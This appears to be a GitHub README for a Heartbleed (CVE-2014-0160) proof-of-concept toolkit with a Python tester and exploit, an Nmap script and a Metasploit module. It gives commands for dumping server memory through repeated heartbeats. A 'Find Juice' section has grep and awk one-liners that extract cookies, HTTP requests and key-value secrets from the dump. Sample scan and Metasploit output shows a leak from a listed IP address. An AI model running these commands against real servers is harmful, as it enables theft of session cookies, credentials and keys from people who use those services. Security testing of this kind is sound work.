/heartbleed-poc

Test for SSL heartbeat vulnerability (CVE-2014-0160)

Primary LanguageRuby

HeartBleed Tester & Exploit

NB Nearly all the tools (nmap, metasploit, nessus, even burp) have the most up to date versions of their scanners. These tools were released at the early stages when tools were still being developed. Rather use those than these now.

Tool Guide

  • If you want to mass scan, the NMAP script is currently your best bet.
  • For the largest number of protocols supports (STARTTLS) check the modified Metasploit script
  • If you want to actually exploit, use the python script (mods required for STARTTLS on non-smtp)

Python Tool

Usage: heartbleed-poc.py server [options]

Test for SSL heartbeat vulnerability (CVE-2014-0160)

Options: -h, --help show this help message and exit -p PORT, --port=PORT TCP port to test (default: 443) -n NUM, --num=NUM Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1) -f FILE, --file=FILE Filename to write dumped memory too (default: dump.bin) -q, --quiet Do not display the memory dump -s, --starttls Check STARTTLS (smtp only right now)

Examples

  • Normal scan, will hit port 443, with 1 iteration: python heartbleed-poc.py example.com

  • Dump memory scan, will make 100 request and put the output in the binary file dump.bin: python heartbleed-poc.py -n100 -f dump.bin example.com

The make sure you get different parts of the HEAP, make sure the server is busy, or you end up with repeat repeat.

  • Check a mail server with STARTTLS (i.e. port 25): python heartbleed-poc.py -s -p 25 example.com

  • There used to be a -v switch to make the TLS version explicit, this is auto-detected now and has been removed

Find Juice

The binary file will have juicy output in it, here are some simple ways of finding the goods:

  • HTTP request: awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin

  • Cookies: grep -a "^Cookie:" dump.bin

  • Interesting Key Value Pairs: pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin

NMAP NSE Script

Usage: nmap --script=ssl-heartbleed -p 443

Example Output:

Starting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-09 17:27 SAST Nmap scan report for <example.org> (1.2.3.4) Host is up (0.0068s latency). PORT STATE SERVICE 443/tcp open https | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | Description: | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. |
| References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 | http://www.openssl.org/news/secadv_20140407.txt |_ http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Metasploit Module

msf > use auxiliary/scanner/ssl/openssl_heartbleed msf auxiliary(openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

Name Current Setting Required Description


RHOSTS yes The target address range or CIDR identifier RPORT 443 yes The target port STARTTLS None yes Protocol to use with STARTTLS, None to avoid STARTTLS (accepted: None, SMTP, IMAP, JABBER, POP3, FTP) THREADS 1 yes The number of concurrent threads TLSVERSION 1.0 yes TLS version to use (accepted: 1.0, 1.1, 1.2)

msf auxiliary(openssl_heartbleed) > set rhosts example.org rhosts => example.org msf auxiliary(openssl_heartbleed) > set STARTTLS FTP STARTTLS => FTP msf auxiliary(openssl_heartbleed) > set PORT 21 PORT => 21 msf auxiliary(openssl_heartbleed) > exploit

[] 37.187.134.197:21 - Trying to start SSL via FTP [] 37.187.134.197:21 - Sending Client Hello... [] 37.187.134.197:21 - Sending Heartbeat... [] 37.187.134.197:21 - Heartbeat response, checking if there is data leaked... [+] 37.187.134.197:21 - Heartbeat response with leak [] 37.187.134.197:21 - Printable info leaked: @SE F(CKMIWsf"!98532ED/A [] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed